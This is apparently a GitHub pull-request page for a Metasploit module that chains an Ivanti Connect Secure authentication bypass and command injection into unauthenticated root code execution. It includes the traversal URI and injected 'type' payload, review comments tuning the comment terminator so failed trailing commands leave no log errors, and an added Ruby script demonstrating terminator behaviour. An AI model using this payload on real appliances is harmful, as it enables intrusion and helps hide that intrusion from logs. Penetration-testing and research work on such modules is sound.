Ivanti Connect Secure RCE exploit module (CVE-2023-46805 and CVE-2024-21887) #18708
… key we expect it to have
documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805.md
modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
```ruby
'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection',
'ctype' => 'application/json',
'data' => {
  'type' => ";#{cmd};",
```
Suggested change:

```diff
-  'type' => ";#{cmd};",
+  'type' => ";#{cmd}#",
```
Since this is a command injection, using a comment (`#`) will prevent the trailing part of the original command from being executed and, ultimately, from showing up in the log as it fails.
…_rce_cve_2023_46805.md Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
…_46805.rb Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
…_46805.rb Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
… portion of the command string (Thank you @jvoisin). We must also include a space character for this to work as expected, doing so also removes the need to bootstrap the Linux payloads with a separate file.
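To make the review thread above concrete, here is an added example that is not code from this PR or from the Metasploit module. It assumes a hypothetical server-side command line (`TEMPLATE`) into which the user-controlled `type` value is spliced unquoted with template text following it; the appliance's real command line is not shown on this page. It runs each candidate terminator through `/bin/sh` and records what a log would see, which is what the `;` versus `#` discussion and the remark about the space character are about.

```ruby
require 'open3'

# Hypothetical stand-in for the vulnerable server-side command line (assumption:
# the real template is not on this page). All that matters here is that the
# user-controlled 'type' value is interpolated unquoted and that template text
# follows it.
TEMPLATE = 'echo probe --type=%<type>s --trailing-flag'

# Build the 'type' value three ways: the PR's original terminator (';'), '#'
# glued directly to the injected command, and '#' preceded by a space.
def build_type(cmd, style)
  case style
  when :semicolon  then ";#{cmd};"
  when :hash       then ";#{cmd}#"
  when :hash_space then ";#{cmd} #"
  else raise ArgumentError, "unknown style #{style.inspect}"
  end
end

# Splice the value into the template exactly as an unquoted interpolation would.
def render(type)
  format(TEMPLATE, type: type)
end

# Hand the rendered line to /bin/sh, as the vulnerable code path would, and
# return what a log would record: stdout, stderr and the exit status.
def run(type)
  out, err, status = Open3.capture3('/bin/sh', '-c', render(type))
  { out: out, err: err, status: status.exitstatus }
end

if __FILE__ == $PROGRAM_NAME
  %i[semicolon hash hash_space].each do |style|
    r = run(build_type('echo injected', style))
    puts "#{style}: status=#{r[:status]} out=#{r[:out].inspect} err=#{r[:err].inspect}"
  end
end
```

With `;` the trailing template text (`--trailing-flag`) is executed as its own command, fails with exit status 127 and leaves an error on stderr. With `#` glued to the injected command, `sh` does not treat it as a comment (a `#` only starts a comment at the beginning of a word), so the trailing text becomes extra arguments to the injected command and pollutes its output. Only `#` preceded by a space discards the rest of the line cleanly, which is the reason the follow-up commit adds the space.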
```ruby
# is only for display purposes, we don't need to test the version information.

begin
  json_data = JSON.parse(res.body)
```
`get_json_document` may be a better option.
I implemented this suggestion via de6ed9e
Linux Command
Unix Command
Release Notes

This PR adds an exploit chain that consists of two vulnerabilities, an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887). The exploit chain allows a remote unauthenticated attacker to execute arbitrary OS commands with root privileges. As per the Ivanti advisory, these vulnerabilities affect all supported versions of the products, versions 9.x and 22.x. It is unknown if the unsupported versions 8.x and older are also affected.
This is a draft pull request for the recent 0day exploit chain against Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887). For technical details on the vulnerabilities used in this exploit, read our AttackerKB Analysis:
To-Do:
Example Usage